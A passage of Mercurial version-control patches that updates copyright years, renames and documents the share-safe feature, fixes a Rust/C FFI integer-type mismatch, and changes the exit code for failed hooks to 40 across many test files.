zotZs;ID50(ZPOkf3~zr{D5A-Ps<Pc~w>#X&@Ym4j&jk#y&EYZ~2Q+9&jg@QQ75-NX NU*q4C?@mvC`4_nJd0qej diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2020 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Matt Mackall and others. </p> <p> diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -7809,7 +7809,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2020 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" b"This is free software; see the source for copying conditions. " b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -147,14 +147,12 @@ merge tool configuration but packagers can also put other default configuration there. -.. container:: verbose - - On versions 5.7 and later, if share-safe functionality is enabled, - shares will read config file of share source too. - `<share-source/.hg/hgrc>` is read before reading `<repo/.hg/hgrc>`. - - For configs which should not be shared, `<repo/.hg/hgrc-not-shared>` - should be used. +On versions 5.7 and later, if share-safe functionality is enabled, +shares will read config file of share source too. +`<share-source/.hg/hgrc>` is read before reading `<repo/.hg/hgrc>`. + +For configs which should not be shared, `<repo/.hg/hgrc-not-shared>` +should be used. Syntax ====== @@ -915,8 +913,27 @@ Disabled by default. ``use-share-safe`` - Enable or disable the "share-safe" functionality, which enables shares - to read requirements and configuration of its source repository. + Enforce "safe" behaviors for all "shares" that access this repository. 
+ + With this feature, "shares" using this repository as a source will: + + * read the source repository's configuration (`<source>/.hg/hgrc`). + * read and use the source repository's "requirements" + (except the working copy specific one). + + Without this feature, "shares" using this repository as a source will: + + * keep tracking the repository "requirements" in the share only, ignoring + the source "requirements", possibly diverging from them. + * ignore source repository config. This can create problems, like silently + ignoring important hooks. + + Beware that existing shares will not be upgraded/downgraded, and by + default, Mercurial will refuse to interact with them until the mismatch + is resolved. See :hg:`help config share.safe-mismatch.source-safe` and + :hg:`help config share.safe-mismatch.source-not-safe` for details. + + Introduced in Mercurial 5.7. Disabled by default. @@ -1959,6 +1976,14 @@ tries to upgrade the share; if it fails, continue by respecting the share source setting + Check :hg:`help config format.use-share-safe` for details about the + share-safe feature. + +``safe-mismatch.source-safe.warn`` + Shows a warning on operations if the shared repository does not use + share-safe, but the source repository does. + (default: True) + ``safe-mismatch.source-not-safe`` Controls what happens when the shared repository uses the share-safe @@ -1977,11 +2002,8 @@ tries to downgrade the share to not use share-safe; if it fails, continue by respecting the shared source setting - -``safe-mismatch.source-safe.warn`` - Shows a warning on operations if the shared repository does not use - share-safe, but the source repository does. - (default: True) + Check :hg:`help config format.use-share-safe` for details about the + share-safe feature. 
``safe-mismatch.source-not-safe.warn`` Shows a warning on operations if the shared repository uses share-safe, diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2020 Matt Mackall. +Copyright (C) 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2020 Matt Mackall. +Mercurial is copyright 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2020 Matt Mackall. +Mercurial is copyright 2005-2021 Matt Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/internals/requirements.txt b/mercurial/helptext/internals/requirements.txt --- a/mercurial/helptext/internals/requirements.txt +++ b/mercurial/helptext/internals/requirements.txt @@ -131,7 +131,7 @@ directory. bookmarksinstore -================== +================ Bookmarks are stored in ``.hg/store/`` instead of directly in ``.hg/`` where they used to be stored. The active bookmark is still stored @@ -156,8 +156,8 @@ benefit from a speedup. The other installations will do the necessary work to keep the index up to date, but will suffer a slowdown. 
-exp-sharesafe -============= +share-safe +========== Represents that the repository can be shared safely. Requirements and config of the source repository will be shared. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -568,6 +568,7 @@ # repository was shared the old way. We check the share source .hg/requires # for SHARESAFE_REQUIREMENT to detect whether the current repository needs # to be reshared + hint = _("see `hg help config.format.use-share-safe` for more information") if requirementsmod.SHARESAFE_REQUIREMENT in requirements: if ( @@ -599,14 +600,10 @@ ) elif mismatch_config == b'abort': raise error.Abort( - _( - b"share source does not support exp-sharesafe requirement" - ) + _(b"share source does not support share-safe requirement"), + hint=hint, ) else: - hint = _( - "run `hg help config.share.safe-mismatch.source-not-safe`" - ) raise error.Abort( _( b"share-safe mismatch with source.\nUnrecognized" @@ -646,10 +643,10 @@ _( b'version mismatch: source uses share-safe' b' functionality while the current share does not' - ) + ), + hint=hint, ) else: - hint = _("run `hg help config.share.safe-mismatch.source-safe`") raise error.Abort( _( b"share-safe mismatch with source.\nUnrecognized" diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -277,15 +277,20 @@ scmutil.writerequires(hgvfs, diffrequires) ui.warn(_(b'repository upgraded to use share-safe mode\n')) except error.LockError as e: + hint = _( + "see `hg help config.format.use-share-safe` for more information" + ) if mismatch_config == b'upgrade-abort': raise error.Abort( _(b'failed to upgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) elif mismatch_warn: ui.warn( _(b'failed to upgrade share, got error: %s\n') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + 
hint=hint, ) finally: if wlock: @@ -329,17 +334,22 @@ scmutil.writerequires(hgvfs, current_requirements) ui.warn(_(b'repository downgraded to not use share-safe mode\n')) except error.LockError as e: + hint = _( + "see `hg help config.format.use-share-safe` for more information" + ) # If upgrade-abort is set, abort when upgrade fails, else let the # process continue as `upgrade-allow` is set if mismatch_config == b'downgrade-abort': raise error.Abort( _(b'failed to downgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) elif mismatch_warn: ui.warn( _(b'failed to downgrade share, got error: %s\n') - % stringutil.forcebytestr(e.strerror) + % stringutil.forcebytestr(e.strerror), + hint=hint, ) finally: if wlock: diff --git a/rust/hg-cpython/src/cindex.rs b/rust/hg-cpython/src/cindex.rs --- a/rust/hg-cpython/src/cindex.rs +++ b/rust/hg-cpython/src/cindex.rs @@ -16,7 +16,7 @@ }; use hg::revlog::{Node, RevlogIndex}; use hg::{Graph, GraphError, Revision, WORKING_DIRECTORY_REVISION}; -use libc::c_int; +use libc::{c_int, ssize_t}; const REVLOG_CABI_VERSION: c_int = 2; @@ -24,10 +24,10 @@ pub struct Revlog_CAPI { abi_version: c_int, index_length: - unsafe extern "C" fn(index: *mut revlog_capi::RawPyObject) -> c_int, + unsafe extern "C" fn(index: *mut revlog_capi::RawPyObject) -> ssize_t, index_node: unsafe extern "C" fn( index: *mut revlog_capi::RawPyObject, - rev: c_int, + rev: ssize_t, ) -> *const Node, index_parents: unsafe extern "C" fn( index: *mut revlog_capi::RawPyObject, @@ -157,7 +157,7 @@ fn node(&self, rev: Revision) -> Option<&Node> { let raw = unsafe { - (self.capi.index_node)(self.index.as_ptr(), rev as c_int) + (self.capi.index_node)(self.index.as_ptr(), rev as ssize_t) }; if raw.is_null() { None diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -1700,6 +1700,8 @@ 'mercurial.pure', ] +py2exe_includes = [] + py2exeexcludes = [] py2exedllexcludes = ['crypt32.dll'] @@ -1710,7 
+1712,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2020 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', 'product_version': version, } ] @@ -1728,6 +1730,10 @@ if extrapackages: py2exepackages.extend(extrapackages.split(' ')) + extra_includes = os.environ.get('HG_PY2EXE_EXTRA_INCLUDES') + if extra_includes: + py2exe_includes.extend(extra_includes.split(' ')) + excludes = os.environ.get('HG_PY2EXE_EXTRA_EXCLUDES') if excludes: py2exeexcludes.extend(excludes.split(' ')) @@ -1827,6 +1833,7 @@ 'py2exe': { 'bundle_files': 3, 'dll_excludes': py2exedllexcludes, + 'includes': py2exe_includes, 'excludes': py2exeexcludes, 'packages': py2exepackages, }, diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -420,7 +420,10 @@ TODO: give the proper error indication from `hg serve` - $ hg --repo ../repo1 update -C tip --debug +TODO: reconsider the except base class so that the git and hg errors yield the +same exit status. + + $ hg --repo ../repo1 update -C tip --debug --config ui.detailed-exit-code=False http auth: user foo, password *** resolving manifests branchmerge: False, force: True, partial: False @@ -460,7 +463,7 @@ Date: $HTTP_DATE$ (git-server !) abort: corrupt remote lfs object: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 (git-server !) abort: LFS server error for "c": Validation error (hg-server !) 
- [50] + [255] The corrupted blob is not added to the usercache or local store diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -31,6 +31,23 @@ #endif +#if rust + +Regression test for a previous bug in Rust/C FFI for the `Revlog_CAPI` capsule: +in places where `mercurial/cext/revlog.c` function signatures use `Py_ssize_t` +(64 bits on Linux x86_64), corresponding declarations in `rust/hg-cpython/src/cindex.rs` +incorrectly used `libc::c_int` (32 bits). +As a result, -1 passed from Rust for the null revision became 4294967295 in C. + + $ hg log -r 00000000 + changeset: -1:000000000000 + tag: tip + user: + date: Thu Jan 01 00:00:00 1970 +0000 + + +#endif + $ hg debugformat format-variant repo diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -405,6 +405,7 @@ $ hg log -GT "{node}: {desc}\n" -R ../nss-share abort: version mismatch: source uses share-safe functionality while the current share does not + (see `hg help config.format.use-share-safe` for more information) [255] @@ -495,7 +496,8 @@ $ hg log -GT "{node}: {desc}\n" -R ../ss-share - abort: share source does not support exp-sharesafe requirement + abort: share source does not support share-safe requirement + (see `hg help config.format.use-share-safe` for more information) [255] Testing automatic downgrade of shares when config is set @@ -503,6 +505,7 @@ $ touch ../ss-share/.hg/wlock $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort abort: failed to downgrade share, got error: Lock held + (see `hg help config.format.use-share-safe` for more information) [255] $ rm ../ss-share/.hg/wlock @@ -545,13 +548,14 @@ store $ hg log -GT "{node}: {desc}\n" -R ../nss-share abort: version mismatch: source uses share-safe functionality while the current share does not + (see `hg help 
config.format.use-share-safe` for more information) [255] Check that if lock is taken, upgrade fails but read operation are successful $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgra abort: share-safe mismatch with source. Unrecognized value 'upgra' of `share.safe-mismatch.source-safe` set. - (run `hg help config.share.safe-mismatch.source-safe`) + (see `hg help config.format.use-share-safe` for more information) [255] $ touch ../nss-share/.hg/wlock $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow @@ -569,6 +573,7 @@ $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort abort: failed to upgrade share, got error: Lock held + (see `hg help config.format.use-share-safe` for more information) [255] $ rm ../nss-share/.hg/wlock diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -100,10 +100,15 @@ received frame(size=1170; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) 
add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks @@ -269,10 +274,15 @@ received frame(size=1170; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks @@ -407,8 +417,11 @@ received frame(size=783; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 3390ef850073 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset b709380892b1 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 47fe012ab237 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 97765fc3cd62 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) 
checking for updated bookmarks @@ -522,6 +535,7 @@ received frame(size=400; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset dc666cf9ecf3 + received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) add changeset 93a8bd067ed2 received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) (?) checking for updated bookmarks # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611942610 18000 # Fri Jan 29 12:50:10 2021 -0500 # Node ID bc3f3b59d0a444fe6e6e2f510c879c30a701fc27 # Parent 16c18d5e5dc88810d3410d9370cb851f508ffbf5 context: add missing manifest invalidation after write in overlayworkingctx This was breaking my merge-diff logic that will be in the next patch. Differential Revision: https://phab.mercurial-scm.org/D9908 diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -2597,6 +2597,7 @@ b'flags': flags, b'copied': copied, } + util.clearcachedproperty(self, b'_manifest') def filectx(self, path, filelog=None): return overlayworkingfilectx( # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611951415 28800 # Fri Jan 29 12:16:55 2021 -0800 # Node ID 7680565497374b00e832a1917065b9afec6b9f25 # Parent bc3f3b59d0a444fe6e6e2f510c879c30a701fc27 errors: use exit code 40 for when a hook fails A hook can be used for checking inputs, state, configuration, security, etc., so it's unclear which of the existing exit codes to use. Let's instead add one specifically for failed hooks. I picked 40. 
Differential Revision: https://phab.mercurial-scm.org/D9910 diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -229,6 +229,8 @@ detailed_exit_code = 20 elif isinstance(inst, error.ConfigError): detailed_exit_code = 30 + elif isinstance(inst, error.HookAbort): + detailed_exit_code = 40 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -1177,7 +1177,7 @@ searching for changes no changes found abort: prepushkey hook exited with status 1 - [255] + [40] #endif diff --git a/tests/test-bookmarks.t b/tests/test-bookmarks.t --- a/tests/test-bookmarks.t +++ b/tests/test-bookmarks.t @@ -1125,7 +1125,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending (check visible bookmarks while transaction running in repo) @@ -1158,7 +1158,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check pretxnclose-bookmark can abort a transaction -------------------------------------------------- @@ -1242,7 +1242,7 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-public hook exited with status 1 - [255] + [40] create on a public changeset @@ -1254,4 +1254,4 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-forward hook exited with status 1 - [255] + [40] diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -638,7 +638,7 @@ remote: Cleaning up the mess... 
remote: rollback completed abort: pretxnclose.failpush hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other @@ -699,7 +699,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -747,7 +747,7 @@ Cleaning up the mess... rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes diff --git a/tests/test-commandserver.t b/tests/test-commandserver.t --- a/tests/test-commandserver.t +++ b/tests/test-commandserver.t @@ -522,7 +522,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand verify checking changesets checking manifests @@ -1013,7 +1013,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log *** runcommand verify -q @@ -1057,7 +1057,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log 0 bar (bar) *** runcommand verify -q diff --git a/tests/test-commit-amend.t b/tests/test-commit-amend.t --- a/tests/test-commit-amend.t +++ b/tests/test-commit-amend.t @@ -209,7 +209,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt message given from command line (no-eol) @@ -234,7 +234,7 @@ transaction abort! 
rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt another precious commit message diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -154,7 +154,7 @@ $ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default 0:cb9a9f314b8b $ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default @@ -166,7 +166,7 @@ $ HGPLAIN= hg log --config='hooks.pre-log=false' -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAINEXCEPT= hg log --cwd .. -q -Ra -b default 0:cb9a9f314b8b diff --git a/tests/test-histedit-edit.t b/tests/test-histedit-edit.t --- a/tests/test-histedit-edit.t +++ b/tests/test-histedit-edit.t @@ -375,7 +375,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt f @@ -400,7 +400,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] diff --git a/tests/test-histedit-fold.t b/tests/test-histedit-fold.t --- a/tests/test-histedit-fold.t +++ b/tests/test-histedit-fold.t @@ -202,7 +202,7 @@ transaction abort! 
rollback completed abort: pretxncommit.abortfolding hook failed - [255] + [40] $ cat .hg/last-message.txt f diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -227,7 +227,7 @@ HG_PATS=[] abort: pre-identify hook exited with status 1 - [255] + [40] $ hg cat b pre-cat hook: HG_ARGS=cat b HG_HOOKNAME=pre-cat @@ -390,7 +390,7 @@ HG_TAG=fa abort: pretag.forbid hook exited with status 1 - [255] + [40] $ hg tag -l fla pretag hook: HG_HOOKNAME=pretag HG_HOOKTYPE=pretag @@ -405,7 +405,7 @@ HG_TAG=fla abort: pretag.forbid hook exited with status 1 - [255] + [40] pretxncommit hook can see changeset, can roll back txn, changeset no more there after @@ -451,7 +451,7 @@ rollback completed abort: pretxncommit.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -485,7 +485,7 @@ HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10 abort: precommit.forbid hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -644,7 +644,7 @@ HG_URL=file:$TESTTMP/a abort: prepushkey hook exited with status 1 - [255] + [40] $ cd ../a test that prelistkeys can prevent listing keys @@ -679,7 +679,7 @@ HG_NAMESPACE=bookmarks abort: prelistkeys hook exited with status 1 - [255] + [40] $ cd ../a $ rm .hg/hgrc @@ -704,7 +704,7 @@ HG_URL=file:$TESTTMP/a abort: prechangegroup.forbid hook exited with status 1 - [255] + [40] pretxnchangegroup hook can see incoming changes, can roll back txn, incoming changes no longer there after @@ -735,7 +735,7 @@ transaction abort! 
rollback completed abort: pretxnchangegroup.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 3:07f3376c1e65 @@ -786,7 +786,7 @@ HG_SOURCE=pull abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] outgoing hooks work for local clones @@ -825,7 +825,7 @@ HG_SOURCE=clone abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] $ cd "$TESTTMP/b" @@ -915,7 +915,7 @@ hooktype preoutgoing source pull abort: preoutgoing.fail hook failed - [255] + [40] $ echo '[hooks]' > ../a/.hg/hgrc $ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc @@ -1283,7 +1283,7 @@ rollback completed strip failed, backup bundle stored in * (glob) abort: pretxnclose.error hook exited with status 1 - [255] + [40] $ hg recover no interrupted transaction available [1] @@ -1306,7 +1306,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a (check (in)visibility of new changeset while transaction running in @@ -1331,7 +1331,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Hook from untrusted hgrc are reported as failure ================================================ @@ -1382,7 +1382,7 @@ rollback completed abort: untrusted hook pretxnclose.testing not executed (see 'hg help config.trusted') - [255] + [40] $ hg log changeset: 0:3903775176ed tag: tip diff --git a/tests/test-mactext.t b/tests/test-mactext.t --- a/tests/test-mactext.t +++ b/tests/test-mactext.t @@ -27,7 +27,7 @@ transaction abort! 
rollback completed abort: pretxncommit.cr hook failed - [255] + [40] $ hg cat f | f --hexdump 0000: 68 65 6c 6c 6f 0a |hello.| diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -377,7 +377,7 @@ merging f some fail message abort: $TESTTMP/mybrokenmerge.py hook failed - [255] + [40] $ aftermerge # cat f revision 1 diff --git a/tests/test-mq-qfold.t b/tests/test-mq-qfold.t --- a/tests/test-mq-qfold.t +++ b/tests/test-mq-qfold.t @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt original message diff --git a/tests/test-mq-qnew.t b/tests/test-mq-qnew.t --- a/tests/test-mq-qnew.t +++ b/tests/test-mq-qnew.t @@ -310,7 +310,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt diff --git a/tests/test-mq-qrefresh-replace-log-message.t b/tests/test-mq-qrefresh-replace-log-message.t --- a/tests/test-mq-qrefresh-replace-log-message.t +++ b/tests/test-mq-qrefresh-replace-log-message.t @@ -191,7 +191,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt Fifth commit message This is the 5th log message @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] (rebuilding at failure of qrefresh bases on rev #0, and it causes dropping status of "file2") @@ -273,7 +273,7 @@ rollback completed qrefresh interrupted while patch was popped! 
(revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== @@ -315,7 +315,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -78,7 +78,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg id 223311e70a6f tip diff --git a/tests/test-narrow-widen.t b/tests/test-narrow-widen.t --- a/tests/test-narrow-widen.t +++ b/tests/test-narrow-widen.t @@ -431,7 +431,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg l $ hg bookmarks no bookmarks set diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -757,7 +757,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending (check (in)visibility of phaseroot while transaction running in repo) @@ -780,7 +780,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check that pretxnclose-phase hook can control phase movement @@ -854,12 +854,12 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --public a603bfb5a83e transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --draft 17a481b3bccb test-debug-phase: move rev 3: 2 -> 1 test-debug-phase: move rev 4: 2 -> 1 @@ -871,7 +871,7 @@ transaction abort! 
rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ cd .. diff --git a/tests/test-rebase-interruptions.t b/tests/test-rebase-interruptions.t --- a/tests/test-rebase-interruptions.t +++ b/tests/test-rebase-interruptions.t @@ -350,7 +350,7 @@ M A rebasing 6:a0b2430ebfb8 tip "F" abort: precommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -401,7 +401,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -451,7 +451,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | diff --git a/tests/test-rollback.t b/tests/test-rollback.t --- a/tests/test-rollback.t +++ b/tests/test-rollback.t @@ -103,7 +103,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt ; echo precious commit message @@ -118,7 +118,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt another precious commit message @@ -380,7 +380,7 @@ warn during abort rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -405,7 +405,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -431,7 +431,7 